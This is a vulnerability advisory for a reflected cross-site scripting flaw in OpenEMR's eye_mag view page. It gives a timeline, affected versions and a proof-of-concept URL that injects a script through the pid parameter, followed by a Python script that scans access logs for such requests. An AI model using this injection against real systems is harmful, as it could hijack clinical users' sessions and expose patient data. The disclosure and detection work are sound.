CVE-2019-16862

Reflected XSS in interface/forms/eye_mag/view.php in OpenEMR 5.x before 5.0.2.1 allows a remote attacker to execute arbitrary code in the context of a user's session via the pid parameter.

Timeline

  • Discovered: September 24, 2019
  • Pull Request Issued: September 24, 2019
  • Reported: September 24, 2019
  • OpenEMR merged pull request: September 24, 2019
  • CVE ID issued: October 24, 2019
  • OpenEMR Release: October 10, 2019 (5.0.2.1)

Version Details

Fixed-In Version: 5.0.2.1

Affected Versions:

  • 5.0.1
  • 5.0.1.1
  • 5.0.1.2
  • 5.0.1.3
  • 5.0.1.4
  • 5.0.1.5
  • 5.0.1.6
  • 5.0.1.7
  • 5.0.2

Credit

Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)

References

Pull Request

POC Exploit

Assuming OpenEMR is running on localhost

http://localhost/openemr/interface/forms/eye_mag/view.php?pid="><script>alert(%27pid%20xss%27);</script><"&id=1
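
For sites that ran an affected version, one way to check web server access logs for requests of this shape. This is an added example, not part of the original advisory or of OpenEMR; it assumes common/combined log format and that a legitimate pid is always a plain integer, and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path from the advisory. Assumption: pid is a numeric patient ID,
# so any value that is not plain ASCII digits is worth a look.
AFFECTED_PATH = "/interface/forms/eye_mag/view.php"
# Request target inside a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, made-up response sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Sep/2019:10:01:02 +0000] "GET /openemr/interface/forms/'
    'eye_mag/view.php?pid=12&id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Sep/2019:10:03:44 +0000] "GET /openemr/interface/forms/'
    'eye_mag/view.php?pid=%22%3E%3Cscript%3Ealert(%27pid%20xss%27);%3C/script%3E'
    '%3C%22&id=1 HTTP/1.1" 200 5342',
    '203.0.113.9 - - [24/Sep/2019:10:04:10 +0000] "GET /openemr/interface/login/'
    'login.php?site=default HTTP/1.1" 200 2048',
]

def suspicious_pid(line):
    """Return the decoded pid if the line requests the affected script with
    a non-numeric pid, otherwise None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not unquote(target.path).endswith(AFFECTED_PATH):
        return None
    # parse_qs percent-decodes once, so an encoded payload is compared decoded.
    for pid in parse_qs(target.query, keep_blank_values=True).get("pid", []):
        if not re.fullmatch(r"[0-9]+", pid):
            return pid
    return None

def scan(lines):
    """Return (line_number, pid) for every flagged line, numbered from 1."""
    hits = []
    for number, line in enumerate(lines, start=1):
        pid = suspicious_pid(line)
        if pid is not None:
            hits.append((number, pid))
    return hits

if __name__ == "__main__":
    for number, pid in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric pid {pid!r}")
```

Only the query string is inspected, since access logs do not record request bodies; a hit means the request was made, not that a browser rendered the response.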